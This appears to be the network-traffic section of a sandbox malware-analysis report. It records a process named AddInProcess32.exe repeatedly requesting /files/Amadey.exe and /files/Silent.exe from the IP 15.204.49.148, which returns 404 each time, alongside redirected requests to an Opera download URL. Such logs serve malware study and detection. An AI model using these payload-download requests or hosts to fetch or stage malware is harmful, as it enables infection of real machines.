                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2230192.168.2.555578107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.751183033 CET135OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.967293978 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2231192.168.2.55559515.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.831438065 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.050627947 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.051220894 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.272334099 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2232192.168.2.55559615.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.842617035 CET55OUTGET /files/Silent.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.057076931 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2233192.168.2.555594107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.844363928 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.066948891 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2234192.168.2.555600107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.866734982 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.084367990 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2235192.168.2.55561115.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.346642971 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.538284063 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.540462017 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.739192963 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2236192.168.2.55561215.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.347779989 CET55OUTGET /files/Silent.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.546372890 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2237192.168.2.555610107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.369354010 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.585905075 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2238192.168.2.555616107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.383063078 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.598359108 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2239192.168.2.55562815.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.628715992 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.851151943 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
